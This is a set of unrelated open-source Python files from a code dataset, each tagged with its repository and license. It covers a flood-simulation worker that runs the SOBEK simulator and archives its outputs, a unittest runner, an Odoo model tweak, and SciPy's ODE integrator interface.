project_dir = os.path.join(sobek_location, sobek_project_directory)
log.debug("project_dir: %s" % project_dir)
log.debug("compute the local location of sobek files")
# first keep all paths as lists of elements, will join them using
# os.sep at the latest possible moment.
case_1_dir = os.path.join(project_dir, '1')
work_dir = os.path.join(project_dir, 'WORK')
cmtwork_dir = os.path.join(project_dir, 'CMTWORK')
output_dir_name = os.path.join(destination_dir, scenario.get_rel_destdir())
model_file_location = os.path.join(
destination_dir, scenario.result_set.get(resulttype=26).resultloc)
log.debug("empty project_dir WORK & 1")
for to_empty in [work_dir, case_1_dir, cmtwork_dir]:
for root, dirs, files in os.walk(to_empty):
for name in files:
os.remove(os.path.join(root, name))
log.debug("open the archived sobek model " + output_dir_name + "model.zip")
input_file = ZipFile(model_file_location, "r")
log.debug("unpacking the archived sobek model to project_dir WORK & 1")
if not os.path.isdir(os.path.join(work_dir, 'grid')):
os.makedirs(os.path.join(work_dir, 'grid'))
if not os.path.isdir(os.path.join(case_1_dir, 'grid')):
os.makedirs(os.path.join(case_1_dir, 'grid'))
for name in input_file.namelist():
content = input_file.read(name)
temp = file(os.path.join(work_dir, name), "wb")
temp.write(content)
temp.close()
temp = file(os.path.join(case_1_dir, name), "wb")
temp.write(content)
temp.close()
settings_ini_location = os.path.join(
source_dir,
scenario.sobekmodel_inundation.sobekversion.fileloc_startfile)
log.debug("copy from " + settings_ini_location + " to the CMTWORK dir")
for name in ['simulate.ini', 'casedesc.cmt']:
temp = file(os.path.join(cmtwork_dir, name), "w")
content = file(os.path.join(settings_ini_location, name), "r").read()
content = content.replace('lizardkb.lit', sobek_project_directory)
content = content.replace('LIZARDKB.LIT', sobek_project_directory)
temp.write(content)
temp.close()
program_name = os.path.join(sobek_location, "programs", "simulate.exe")
configuration = os.path.join(cmtwork_dir, 'simulate.ini')
log.debug("Close connection before spawning a subprocess.")
db.close_connection()
log.debug('about to spawn the simulate subprocess')
cmd, cwd = [program_name, configuration], cmtwork_dir
log.debug('command_list: %s, current_dir: %s' % (cmd, cwd))
os.chdir(cwd)
child = subprocess.Popen(cmd)
log.debug('about to start the watchdog thread')
log.debug('cmtwork_dir %s, %s' % (type(cmtwork_dir), cmtwork_dir))
watchdog_t = threading.Thread(target=watchdog, args=(child, cmtwork_dir))
watchdog_t.start()
log.debug('about to start the alarm thread')
alarm_t = threading.Thread(target=alarm_handler, args=(timeout, child,))
alarm_t.start()
log.debug("starting to wait for completion of subprocess")
child.wait()
log.debug('child returned')
log.debug("open all destination zip files.")
max_file_nr = {}
min_file_nr = {}
resulttypes = ResultType.objects.filter(program=1)
matcher_destination = [(r.id, re.compile(r.content_names_re, re.I),
ZipFile(os.path.join(output_dir_name, r.name + '.zip'),
mode="w", compression=ZIP_DEFLATED),
r.name)
for r in resulttypes if r.content_names_re is not None]
# check the result of the execution
saved = 0
for filename in os.listdir(work_dir):
log.debug("checking what to do with output file '%s'" % filename)
for type_id, matcher, dest, _ in matcher_destination:
if matcher.match(filename):
log.debug("saving %s to %s" % (filename, dest.filename))
content = file(os.path.join(work_dir, filename), 'rb').read()
dest.writestr(filename, content)
saved += 1
try:
nr = int(''.join([i for i in filename[4:] if i.isdigit()]))
if nr > max_file_nr.setdefault(type_id, 0):
max_file_nr[type_id] = nr
if nr < min_file_nr.setdefault(type_id, 999):
min_file_nr[type_id] = nr
except:
pass
break
log.debug("close all destination zip files")
for _, _, dest, _ in matcher_destination:
dest.close()
log.debug("adding to the database what results have been computed...")
for resulttype_id, _, _, name in matcher_destination:
# table results
result, new = scenario.result_set.get_or_create(
resulttype=ResultType.objects.get(pk=resulttype_id))
result.resultloc = os.path.join(
scenario.get_rel_destdir(), name + '.zip')
result.firstnr = min_file_nr.get(resulttype_id)
result.lastnr = max_file_nr.get(resulttype_id)
result.save()
log.info("saved %d files" % saved)
log.debug("check return code and return False if not ok")
try:
output = file(os.path.join(cmtwork_dir, 'PLUVIUS1.rtn'), "r")
remarks = output.read()
except:
remarks = ' 51\nerror reading output file'
remarks = 'rev: ' + __revision__ + "\n" + remarks
log.info(remarks)
log.debug("close db connection to avoid an idle process.")
db.close_connection()
successful = int(re.findall(r'\d+', remarks)[0]) == 0
return successful
|
lizardsystem/flooding-worker
|
flooding_worker/tasks/spawn.py
|
Python
|
gpl-3.0
| 12,846
|
# BEGIN_COPYRIGHT
#
# Copyright (C) 2014-2017 Open Microscopy Environment:
# - University of Dundee
# - CRS4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# END_COPYRIGHT
import os
import unittest
def main():
test_root = os.path.dirname(os.path.abspath(__file__))
suite = unittest.defaultTestLoader.discover(test_root)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
if __name__ == "__main__":
main()
|
simleo/pydoop-features
|
test/all_tests.py
|
Python
|
apache-2.0
| 944
|
# -*- coding: utf-8 -*-
# Copyright 2017 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import fields, models
class AccountAccountType(models.Model):
_inherit = 'account.account.type'
_order = 'sequence asc'
sequence = fields.Integer(
string=u'Sequence',
)
|
thinkopensolutions/l10n-brazil
|
financial_account/models/inherited_account_account_type.py
|
Python
|
agpl-3.0
| 318
|
# Authors: Pearu Peterson, Pauli Virtanen, John Travers
"""
First-order ODE integrators.
User-friendly interface to various numerical integrators for solving a
system of first order ODEs with prescribed initial conditions::
d y(t)[i]
--------- = f(t,y(t))[i],
d t
y(t=0)[i] = y0[i],
where::
i = 0, ..., len(y0) - 1
class ode
---------
A generic interface class to numeric integrators. It has the following
methods::
integrator = ode(f, jac=None)
integrator = integrator.set_integrator(name, **params)
integrator = integrator.set_initial_value(y0, t0=0.0)
integrator = integrator.set_f_params(*args)
integrator = integrator.set_jac_params(*args)
y1 = integrator.integrate(t1, step=False, relax=False)
flag = integrator.successful()
class complex_ode
-----------------
This class has the same generic interface as ode, except it can handle complex
f, y and Jacobians by transparently translating them into the equivalent
real-valued system. It supports the real-valued solvers (i.e., not zvode) and is
an alternative to ode with the zvode solver, sometimes performing better.
"""
# XXX: Integrators must have:
# ===========================
# cvode - C version of vode and vodpk with many improvements.
# Get it from http://www.netlib.org/ode/cvode.tar.gz.
# To wrap cvode to Python, one must write the extension module by
# hand. Its interface is too much 'advanced C' that using f2py
# would be too complicated (or impossible).
#
# How to define a new integrator:
# ===============================
#
# class myodeint(IntegratorBase):
#
# runner = <odeint function> or None
#
# def __init__(self,...): # required
# <initialize>
#
# def reset(self,n,has_jac): # optional
# # n - the size of the problem (number of equations)
# # has_jac - whether user has supplied its own routine for Jacobian
# <allocate memory,initialize further>
#
# def run(self,f,jac,y0,t0,t1,f_params,jac_params): # required
# # this method is called to integrate from t=t0 to t=t1
# # with initial condition y0. f and jac are user-supplied functions
# # that define the problem. f_params,jac_params are additional
# # arguments
# # to these functions.
# <calculate y1>
# if <calculation was unsuccessful>:
# self.success = 0
# return t1,y1
#
# # In addition, one can define step() and run_relax() methods (they
# # take the same arguments as run()) if the integrator can support
# # these features (see IntegratorBase doc strings).
#
# if myodeint.runner:
# IntegratorBase.integrator_classes.append(myodeint)
__all__ = ['ode', 'complex_ode']
__version__ = "$Id$"
__docformat__ = "restructuredtext en"
import re
import warnings
from numpy import asarray, array, zeros, isscalar, real, imag, vstack
from . import vode as _vode
from . import _dop
from . import lsoda as _lsoda
_dop_int_dtype = _dop.types.intvar.dtype
_vode_int_dtype = _vode.types.intvar.dtype
_lsoda_int_dtype = _lsoda.types.intvar.dtype
# ------------------------------------------------------------------------------
# User interface
# ------------------------------------------------------------------------------
class ode:
"""
A generic interface class to numeric integrators.
Solve an equation system :math:`y'(t) = f(t,y)` with (optional) ``jac = df/dy``.
*Note*: The first two arguments of ``f(t, y, ...)`` are in the
opposite order of the arguments in the system definition function used
by `scipy.integrate.odeint`.
Parameters
----------
f : callable ``f(t, y, *f_args)``
Right-hand side of the differential equation. t is a scalar,
``y.shape == (n,)``.
``f_args`` is set by calling ``set_f_params(*args)``.
`f` should return a scalar, array or list (not a tuple).
jac : callable ``jac(t, y, *jac_args)``, optional
Jacobian of the right-hand side, ``jac[i,j] = d f[i] / d y[j]``.
``jac_args`` is set by calling ``set_jac_params(*args)``.
Attributes
----------
t : float
Current time.
y : ndarray
Current variable values.
See also
--------
odeint : an integrator with a simpler interface based on lsoda from ODEPACK
quad : for finding the area under a curve
Notes
-----
Available integrators are listed below. They can be selected using
the `set_integrator` method.
"vode"
Real-valued Variable-coefficient Ordinary Differential Equation
solver, with fixed-leading-coefficient implementation. It provides
implicit Adams method (for non-stiff problems) and a method based on
backward differentiation formulas (BDF) (for stiff problems).
Source: http://www.netlib.org/ode/vode.f
.. warning::
This integrator is not re-entrant. You cannot have two `ode`
instances using the "vode" integrator at the same time.
This integrator accepts the following parameters in `set_integrator`
method of the `ode` class:
- atol : float or sequence
absolute tolerance for solution
- rtol : float or sequence
relative tolerance for solution
- lband : None or int
- uband : None or int
Jacobian band width, jac[i,j] != 0 for i-lband <= j <= i+uband.
Setting these requires your jac routine to return the jacobian
in packed format, jac_packed[i-j+uband, j] = jac[i,j]. The
dimension of the matrix must be (lband+uband+1, len(y)).
- method: 'adams' or 'bdf'
Which solver to use, Adams (non-stiff) or BDF (stiff)
- with_jacobian : bool
This option is only considered when the user has not supplied a
Jacobian function and has not indicated (by setting either band)
that the Jacobian is banded. In this case, `with_jacobian` specifies
whether the iteration method of the ODE solver's correction step is
chord iteration with an internally generated full Jacobian or
functional iteration with no Jacobian.
- nsteps : int
Maximum number of (internally defined) steps allowed during one
call to the solver.
- first_step : float
- min_step : float
- max_step : float
Limits for the step sizes used by the integrator.
- order : int
Maximum order used by the integrator,
order <= 12 for Adams, <= 5 for BDF.
"zvode"
Complex-valued Variable-coefficient Ordinary Differential Equation
solver, with fixed-leading-coefficient implementation. It provides
implicit Adams method (for non-stiff problems) and a method based on
backward differentiation formulas (BDF) (for stiff problems).
Source: http://www.netlib.org/ode/zvode.f
.. warning::
This integrator is not re-entrant. You cannot have two `ode`
instances using the "zvode" integrator at the same time.
This integrator accepts the same parameters in `set_integrator`
as the "vode" solver.
.. note::
When using ZVODE for a stiff system, it should only be used for
the case in which the function f is analytic, that is, when each f(i)
is an analytic function of each y(j). Analyticity means that the
partial derivative df(i)/dy(j) is a unique complex number, and this
fact is critical in the way ZVODE solves the dense or banded linear
systems that arise in the stiff case. For a complex stiff ODE system
in which f is not analytic, ZVODE is likely to have convergence
failures, and for this problem one should instead use DVODE on the
equivalent real system (in the real and imaginary parts of y).
"lsoda"
Real-valued Variable-coefficient Ordinary Differential Equation
solver, with fixed-leading-coefficient implementation. It provides
automatic method switching between implicit Adams method (for non-stiff
problems) and a method based on backward differentiation formulas (BDF)
(for stiff problems).
Source: http://www.netlib.org/odepack
.. warning::
This integrator is not re-entrant. You cannot have two `ode`
instances using the "lsoda" integrator at the same time.
This integrator accepts the following parameters in `set_integrator`
method of the `ode` class:
- atol : float or sequence
absolute tolerance for solution
- rtol : float or sequence
relative tolerance for solution
- lband : None or int
- uband : None or int
Jacobian band width, jac[i,j] != 0 for i-lband <= j <= i+uband.
Setting these requires your jac routine to return the jacobian
in packed format, jac_packed[i-j+uband, j] = jac[i,j].
- with_jacobian : bool
*Not used.*
- nsteps : int
Maximum number of (internally defined) steps allowed during one
call to the solver.
- first_step : float
- min_step : float
- max_step : float
Limits for the step sizes used by the integrator.
- max_order_ns : int
Maximum order used in the nonstiff case (default 12).
- max_order_s : int
Maximum order used in the stiff case (default 5).
- max_hnil : int
Maximum number of messages reporting too small step size (t + h = t)
(default 0)
- ixpr : int
Whether to generate extra printing at method switches (default False).
"dopri5"
This is an explicit runge-kutta method of order (4)5 due to Dormand &
Prince (with stepsize control and dense output).
Authors:
E. Hairer and G. Wanner
Universite de Geneve, Dept. de Mathematiques
CH-1211 Geneve 24, Switzerland
e-mail: ernst.hairer@math.unige.ch, gerhard.wanner@math.unige.ch
This code is described in [HNW93]_.
This integrator accepts the following parameters in set_integrator()
method of the ode class:
- atol : float or sequence
absolute tolerance for solution
- rtol : float or sequence
relative tolerance for solution
- nsteps : int
Maximum number of (internally defined) steps allowed during one
call to the solver.
- first_step : float
- max_step : float
- safety : float
Safety factor on new step selection (default 0.9)
- ifactor : float
- dfactor : float
Maximum factor to increase/decrease step size by in one step
- beta : float
Beta parameter for stabilised step size control.
- verbosity : int
Switch for printing messages (< 0 for no messages).
"dop853"
This is an explicit runge-kutta method of order 8(5,3) due to Dormand
& Prince (with stepsize control and dense output).
Options and references the same as "dopri5".
Examples
--------
A problem to integrate and the corresponding jacobian:
>>> from scipy.integrate import ode
>>>
>>> y0, t0 = [1.0j, 2.0], 0
>>>
>>> def f(t, y, arg1):
... return [1j*arg1*y[0] + y[1], -arg1*y[1]**2]
>>> def jac(t, y, arg1):
... return [[1j*arg1, 1], [0, -arg1*2*y[1]]]
The integration:
>>> r = ode(f, jac).set_integrator('zvode', method='bdf')
>>> r.set_initial_value(y0, t0).set_f_params(2.0).set_jac_params(2.0)
>>> t1 = 10
>>> dt = 1
>>> while r.successful() and r.t < t1:
... print(r.t+dt, r.integrate(r.t+dt))
1 [-0.71038232+0.23749653j 0.40000271+0.j ]
2.0 [0.19098503-0.52359246j 0.22222356+0.j ]
3.0 [0.47153208+0.52701229j 0.15384681+0.j ]
4.0 [-0.61905937+0.30726255j 0.11764744+0.j ]
5.0 [0.02340997-0.61418799j 0.09523835+0.j ]
6.0 [0.58643071+0.339819j 0.08000018+0.j ]
7.0 [-0.52070105+0.44525141j 0.06896565+0.j ]
8.0 [-0.15986733-0.61234476j 0.06060616+0.j ]
9.0 [0.64850462+0.15048982j 0.05405414+0.j ]
10.0 [-0.38404699+0.56382299j 0.04878055+0.j ]
References
----------
.. [HNW93] E. Hairer, S.P. Norsett and G. Wanner, Solving Ordinary
Differential Equations i. Nonstiff Problems. 2nd edition.
Springer Series in Computational Mathematics,
Springer-Verlag (1993)
"""
def __init__(self, f, jac=None):
self.stiff = 0
self.f = f
self.jac = jac
self.f_params = ()
self.jac_params = ()
self._y = []
@property
def y(self):
return self._y
def set_initial_value(self, y, t=0.0):
"""Set initial conditions y(t) = y."""
if isscalar(y):
y = [y]
n_prev = len(self._y)
if not n_prev:
self.set_integrator('') # find first available integrator
self._y = asarray(y, self._integrator.scalar)
self.t = t
self._integrator.reset(len(self._y), self.jac is not None)
return self
def set_integrator(self, name, **integrator_params):
"""
Set integrator by name.
Parameters
----------
name : str
Name of the integrator.
integrator_params
Additional parameters for the integrator.
"""
integrator = find_integrator(name)
if integrator is None:
# FIXME: this really should be raise an exception. Will that break
# any code?
warnings.warn('No integrator name match with %r or is not '
'available.' % name)
else:
self._integrator = integrator(**integrator_params)
if not len(self._y):
self.t = 0.0
self._y = array([0.0], self._integrator.scalar)
self._integrator.reset(len(self._y), self.jac is not None)
return self
def integrate(self, t, step=False, relax=False):
"""Find y=y(t), set y as an initial condition, and return y.
Parameters
----------
t : float
The endpoint of the integration step.
step : bool
If True, and if the integrator supports the step method,
then perform a single integration step and return.
This parameter is provided in order to expose internals of
the implementation, and should not be changed from its default
value in most cases.
relax : bool
If True and if the integrator supports the run_relax method,
then integrate until t_1 >= t and return. ``relax`` is not
referenced if ``step=True``.
This parameter is provided in order to expose internals of
the implementation, and should not be changed from its default
value in most cases.
Returns
-------
y : float
The integrated value at t
"""
if step and self._integrator.supports_step:
mth = self._integrator.step
elif relax and self._integrator.supports_run_relax:
mth = self._integrator.run_relax
else:
mth = self._integrator.run
try:
self._y, self.t = mth(self.f, self.jac or (lambda: None),
self._y, self.t, t,
self.f_params, self.jac_params)
except SystemError as e:
# f2py issue with tuple returns, see ticket 1187.
raise ValueError(
'Function to integrate must not return a tuple.'
) from e
return self._y
def successful(self):
"""Check if integration was successful."""
try:
self._integrator
except AttributeError:
self.set_integrator('')
return self._integrator.success == 1
def get_return_code(self):
"""Extracts the return code for the integration to enable better control
if the integration fails.
In general, a return code > 0 implies success, while a return code < 0
implies failure.
Notes
-----
This section describes possible return codes and their meaning, for available
integrators that can be selected by `set_integrator` method.
"vode"
=========== =======
Return Code Message
=========== =======
2 Integration successful.
-1 Excess work done on this call. (Perhaps wrong MF.)
-2 Excess accuracy requested. (Tolerances too small.)
-3 Illegal input detected. (See printed message.)
-4 Repeated error test failures. (Check all input.)
-5 Repeated convergence failures. (Perhaps bad Jacobian
supplied or wrong choice of MF or tolerances.)
-6 Error weight became zero during problem. (Solution
component i vanished, and ATOL or ATOL(i) = 0.)
=========== =======
"zvode"
=========== =======
Return Code Message
=========== =======
2 Integration successful.
-1 Excess work done on this call. (Perhaps wrong MF.)
-2 Excess accuracy requested. (Tolerances too small.)
-3 Illegal input detected. (See printed message.)
-4 Repeated error test failures. (Check all input.)
-5 Repeated convergence failures. (Perhaps bad Jacobian
supplied or wrong choice of MF or tolerances.)
-6 Error weight became zero during problem. (Solution
component i vanished, and ATOL or ATOL(i) = 0.)
=========== =======
"dopri5"
=========== =======
Return Code Message
=========== =======
1 Integration successful.
2 Integration successful (interrupted by solout).
-1 Input is not consistent.
-2 Larger nsteps is needed.
-3 Step size becomes too small.
-4 Problem is probably stiff (interrupted).
=========== =======
"dop853"
=========== =======
Return Code Message
=========== =======
1 Integration successful.
2 Integration successful (interrupted by solout).
-1 Input is not consistent.
-2 Larger nsteps is needed.
-3 Step size becomes too small.
-4 Problem is probably stiff (interrupted).
=========== =======
"lsoda"
=========== =======
Return Code Message
=========== =======
2 Integration successful.
-1 Excess work done on this call (perhaps wrong Dfun type).
-2 Excess accuracy requested (tolerances too small).
-3 Illegal input detected (internal error).
-4 Repeated error test failures (internal error).
-5 Repeated convergence failures (perhaps bad Jacobian or tolerances).
-6 Error weight became zero during problem.
-7 Internal workspace insufficient to finish (internal error).
=========== =======
"""
try:
self._integrator
except AttributeError:
self.set_integrator('')
return self._integrator.istate
def set_f_params(self, *args):
"""Set extra parameters for user-supplied function f."""
self.f_params = args
return self
def set_jac_params(self, *args):
"""Set extra parameters for user-supplied function jac."""
self.jac_params = args
return self
def set_solout(self, solout):
"""
Set callable to be called at every successful integration step.
Parameters
----------
solout : callable
``solout(t, y)`` is called at each internal integrator step,
t is a scalar providing the current independent position
y is the current soloution ``y.shape == (n,)``
solout should return -1 to stop integration
otherwise it should return None or 0
"""
if self._integrator.supports_solout:
self._integrator.set_solout(solout)
if self._y is not None:
self._integrator.reset(len(self._y), self.jac is not None)
else:
raise ValueError("selected integrator does not support solout,"
" choose another one")
def _transform_banded_jac(bjac):
"""
Convert a real matrix of the form (for example)
[0 0 A B] [0 0 0 B]
[0 0 C D] [0 0 A D]
[E F G H] to [0 F C H]
[I J K L] [E J G L]
[I 0 K 0]
That is, every other column is shifted up one.
"""
# Shift every other column.
newjac = zeros((bjac.shape[0] + 1, bjac.shape[1]))
newjac[1:, ::2] = bjac[:, ::2]
newjac[:-1, 1::2] = bjac[:, 1::2]
return newjac
class complex_ode(ode):
"""
A wrapper of ode for complex systems.
This functions similarly as `ode`, but re-maps a complex-valued
equation system to a real-valued one before using the integrators.
Parameters
----------
f : callable ``f(t, y, *f_args)``
Rhs of the equation. t is a scalar, ``y.shape == (n,)``.
``f_args`` is set by calling ``set_f_params(*args)``.
jac : callable ``jac(t, y, *jac_args)``
Jacobian of the rhs, ``jac[i,j] = d f[i] / d y[j]``.
``jac_args`` is set by calling ``set_f_params(*args)``.
Attributes
----------
t : float
Current time.
y : ndarray
Current variable values.
Examples
--------
For usage examples, see `ode`.
"""
def __init__(self, f, jac=None):
self.cf = f
self.cjac = jac
if jac is None:
ode.__init__(self, self._wrap, None)
else:
ode.__init__(self, self._wrap, self._wrap_jac)
def _wrap(self, t, y, *f_args):
f = self.cf(*((t, y[::2] + 1j * y[1::2]) + f_args))
# self.tmp is a real-valued array containing the interleaved
# real and imaginary parts of f.
self.tmp[::2] = real(f)
self.tmp[1::2] = imag(f)
return self.tmp
def _wrap_jac(self, t, y, *jac_args):
# jac is the complex Jacobian computed by the user-defined function.
jac = self.cjac(*((t, y[::2] + 1j * y[1::2]) + jac_args))
# jac_tmp is the real version of the complex Jacobian. Each complex
# entry in jac, say 2+3j, becomes a 2x2 block of the form
# [2 -3]
# [3 2]
jac_tmp = zeros((2 * jac.shape[0], 2 * jac.shape[1]))
jac_tmp[1::2, 1::2] = jac_tmp[::2, ::2] = real(jac)
jac_tmp[1::2, ::2] = imag(jac)
jac_tmp[::2, 1::2] = -jac_tmp[1::2, ::2]
ml = getattr(self._integrator, 'ml', None)
mu = getattr(self._integrator, 'mu', None)
if ml is not None or mu is not None:
# Jacobian is banded. The user's Jacobian function has computed
# the complex Jacobian in packed format. The corresponding
# real-valued version has every other column shifted up.
jac_tmp = _transform_banded_jac(jac_tmp)
return jac_tmp
@property
def y(self):
return self._y[::2] + 1j * self._y[1::2]
def set_integrator(self, name, **integrator_params):
"""
Set integrator by name.
Parameters
----------
name : str
Name of the integrator
integrator_params
Additional parameters for the integrator.
"""
if name == 'zvode':
raise ValueError("zvode must be used with ode, not complex_ode")
lband = integrator_params.get('lband')
uband = integrator_params.get('uband')
if lband is not None or uband is not None:
# The Jacobian is banded. Override the user-supplied bandwidths
# (which are for the complex Jacobian) with the bandwidths of
# the corresponding real-valued Jacobian wrapper of the complex
# Jacobian.
integrator_params['lband'] = 2 * (lband or 0) + 1
integrator_params['uband'] = 2 * (uband or 0) + 1
return ode.set_integrator(self, name, **integrator_params)
def set_initial_value(self, y, t=0.0):
"""Set initial conditions y(t) = y."""
y = asarray(y)
self.tmp = zeros(y.size * 2, 'float')
self.tmp[::2] = real(y)
self.tmp[1::2] = imag(y)
return ode.set_initial_value(self, self.tmp, t)
def integrate(self, t, step=False, relax=False):
"""Find y=y(t), set y as an initial condition, and return y.
Parameters
----------
t : float
The endpoint of the integration step.
step : bool
If True, and if the integrator supports the step method,
then perform a single integration step and return.
This parameter is provided in order to expose internals of
the implementation, and should not be changed from its default
value in most cases.
relax : bool
If True and if the integrator supports the run_relax method,
then integrate until t_1 >= t and return. ``relax`` is not
referenced if ``step=True``.
This parameter is provided in order to expose internals of
the implementation, and should not be changed from its default
value in most cases.
Returns
-------
y : float
The integrated value at t
"""
y = ode.integrate(self, t, step, relax)
return y[::2] + 1j * y[1::2]
def set_solout(self, solout):
"""
Set callable to be called at every successful integration step.
Parameters
----------
solout : callable
``solout(t, y)`` is called at each internal integrator step,
t is a scalar providing the current independent position
y is the current soloution ``y.shape == (n,)``
solout should return -1 to stop integration
otherwise it should return None or 0
"""
if self._integrator.supports_solout:
self._integrator.set_solout(solout, complex=True)
else:
raise TypeError("selected integrator does not support solouta,"
+ "choose another one")
# ------------------------------------------------------------------------------
# ODE integrators
# ------------------------------------------------------------------------------
def find_integrator(name):
for cl in IntegratorBase.integrator_classes:
if re.match(name, cl.__name__, re.I):
return cl
return None
class IntegratorConcurrencyError(RuntimeError):
"""
Failure due to concurrent usage of an integrator that can be used
only for a single problem at a time.
"""
def __init__(self, name):
msg = ("Integrator `%s` can be used to solve only a single problem "
"at a time. If you want to integrate multiple problems, "
"consider using a different integrator "
"(see `ode.set_integrator`)") % name
RuntimeError.__init__(self, msg)
class IntegratorBase:
runner = None # runner is None => integrator is not available
success = None # success==1 if integrator was called successfully
istate = None # istate > 0 means success, istate < 0 means failure
supports_run_relax = None
supports_step = None
supports_solout = False
integrator_classes = []
scalar = float
def acquire_new_handle(self):
# Some of the integrators have internal state (ancient
# Fortran...), and so only one instance can use them at a time.
# We keep track of this, and fail when concurrent usage is tried.
self.__class__.active_global_handle += 1
self.handle = self.__class__.active_global_handle
def check_handle(self):
if self.handle is not self.__class__.active_global_handle:
raise IntegratorConcurrencyError(self.__class__.__name__)
def reset(self, n, has_jac):
"""Prepare integrator for call: allocate memory, set flags, etc.
n - number of equations.
has_jac - if user has supplied function for evaluating Jacobian.
"""
def run(self, f, jac, y0, t0, t1, f_params, jac_params):
"""Integrate from t=t0 to t=t1 using y0 as an initial condition.
Return 2-tuple (y1,t1) where y1 is the result and t=t1
defines the stoppage coordinate of the result.
"""
raise NotImplementedError('all integrators must define '
'run(f, jac, t0, t1, y0, f_params, jac_params)')
def step(self, f, jac, y0, t0, t1, f_params, jac_params):
"""Make one integration step and return (y1,t1)."""
raise NotImplementedError('%s does not support step() method' %
self.__class__.__name__)
def run_relax(self, f, jac, y0, t0, t1, f_params, jac_params):
"""Integrate from t=t0 to t>=t1 and return (y1,t)."""
raise NotImplementedError('%s does not support run_relax() method' %
self.__class__.__name__)
# XXX: __str__ method for getting visual state of the integrator
def _vode_banded_jac_wrapper(jacfunc, ml, jac_params):
"""
Wrap a banded Jacobian function with a function that pads
the Jacobian with `ml` rows of zeros.
"""
def jac_wrapper(t, y):
jac = asarray(jacfunc(t, y, *jac_params))
padded_jac = vstack((jac, zeros((ml, jac.shape[1]))))
return padded_jac
return jac_wrapper
class vode(IntegratorBase):
runner = getattr(_vode, 'dvode', None)
messages = {-1: 'Excess work done on this call. (Perhaps wrong MF.)',
-2: 'Excess accuracy requested. (Tolerances too small.)',
-3: 'Illegal input detected. (See printed message.)',
-4: 'Repeated error test failures. (Check all input.)',
-5: 'Repeated convergence failures. (Perhaps bad'
' Jacobian supplied or wrong choice of MF or tolerances.)',
-6: 'Error weight became zero during problem. (Solution'
' component i vanished, and ATOL or ATOL(i) = 0.)'
}
supports_run_relax = 1
supports_step = 1
active_global_handle = 0
def __init__(self,
method='adams',
with_jacobian=False,
rtol=1e-6, atol=1e-12,
lband=None, uband=None,
order=12,
nsteps=500,
max_step=0.0, # corresponds to infinite
min_step=0.0,
first_step=0.0, # determined by solver
):
if re.match(method, r'adams', re.I):
self.meth = 1
elif re.match(method, r'bdf', re.I):
self.meth = 2
else:
raise ValueError('Unknown integration method %s' % method)
self.with_jacobian = with_jacobian
self.rtol = rtol
self.atol = atol
self.mu = uband
self.ml = lband
self.order = order
self.nsteps = nsteps
self.max_step = max_step
self.min_step = min_step
self.first_step = first_step
self.success = 1
self.initialized = False
def _determine_mf_and_set_bands(self, has_jac):
"""
Determine the `MF` parameter (Method Flag) for the Fortran subroutine `dvode`.
In the Fortran code, the legal values of `MF` are:
10, 11, 12, 13, 14, 15, 20, 21, 22, 23, 24, 25,
-11, -12, -14, -15, -21, -22, -24, -25
but this Python wrapper does not use negative values.
Returns
mf = 10*self.meth + miter
self.meth is the linear multistep method:
self.meth == 1: method="adams"
self.meth == 2: method="bdf"
miter is the correction iteration method:
miter == 0: Functional iteraton; no Jacobian involved.
miter == 1: Chord iteration with user-supplied full Jacobian.
miter == 2: Chord iteration with internally computed full Jacobian.
miter == 3: Chord iteration with internally computed diagonal Jacobian.
miter == 4: Chord iteration with user-supplied banded Jacobian.
miter == 5: Chord iteration with internally computed banded Jacobian.
Side effects: If either self.mu or self.ml is not None and the other is None,
then the one that is None is set to 0.
"""
jac_is_banded = self.mu is not None or self.ml is not None
if jac_is_banded:
if self.mu is None:
self.mu = 0
if self.ml is None:
self.ml = 0
# has_jac is True if the user provided a Jacobian function.
if has_jac:
if jac_is_banded:
miter = 4
else:
miter = 1
else:
if jac_is_banded:
if self.ml == self.mu == 0:
miter = 3 # Chord iteration with internal diagonal Jacobian.
else:
miter = 5 # Chord iteration with internal banded Jacobian.
else:
# self.with_jacobian is set by the user in the call to ode.set_integrator.
if self.with_jacobian:
miter = 2 # Chord iteration with internal full Jacobian.
else:
miter = 0 # Functional iteraton; no Jacobian involved.
mf = 10 * self.meth + miter
return mf
def reset(self, n, has_jac):
mf = self._determine_mf_and_set_bands(has_jac)
if mf == 10:
lrw = 20 + 16 * n
elif mf in [11, 12]:
lrw = 22 + 16 * n + 2 * n * n
elif mf == 13:
lrw = 22 + 17 * n
elif mf in [14, 15]:
lrw = 22 + 18 * n + (3 * self.ml + 2 * self.mu) * n
elif mf == 20:
lrw = 20 + 9 * n
elif mf in [21, 22]:
lrw = 22 + 9 * n + 2 * n * n
elif mf == 23:
lrw = 22 + 10 * n
elif mf in [24, 25]:
lrw = 22 + 11 * n + (3 * self.ml + 2 * self.mu) * n
else:
raise ValueError('Unexpected mf=%s' % mf)
if mf % 10 in [0, 3]:
liw = 30
else:
liw = 30 + n
rwork = zeros((lrw,), float)
rwork[4] = self.first_step
rwork[5] = self.max_step
rwork[6] = self.min_step
self.rwork = rwork
iwork = zeros((liw,), _vode_int_dtype)
if self.ml is not None:
iwork[0] = self.ml
if self.mu is not None:
iwork[1] = self.mu
iwork[4] = self.order
iwork[5] = self.nsteps
iwork[6] = 2 # mxhnil
self.iwork = iwork
self.call_args = [self.rtol, self.atol, 1, 1,
self.rwork, self.iwork, mf]
self.success = 1
self.initialized = False
def run(self, f, jac, y0, t0, t1, f_params, jac_params):
if self.initialized:
self.check_handle()
else:
self.initialized = True
self.acquire_new_handle()
if self.ml is not None and self.ml > 0:
# Banded Jacobian. Wrap the user-provided function with one
# that pads the Jacobian array with the extra `self.ml` rows
# required by the f2py-generated wrapper.
jac = _vode_banded_jac_wrapper(jac, self.ml, jac_params)
args = ((f, jac, y0, t0, t1) + tuple(self.call_args) +
(f_params, jac_params))
y1, t, istate = self.runner(*args)
self.istate = istate
if istate < 0:
unexpected_istate_msg = 'Unexpected istate={:d}'.format(istate)
warnings.warn('{:s}: {:s}'.format(self.__class__.__name__,
self.messages.get(istate, unexpected_istate_msg)))
self.success = 0
else:
self.call_args[3] = 2 # upgrade istate from 1 to 2
self.istate = 2
return y1, t
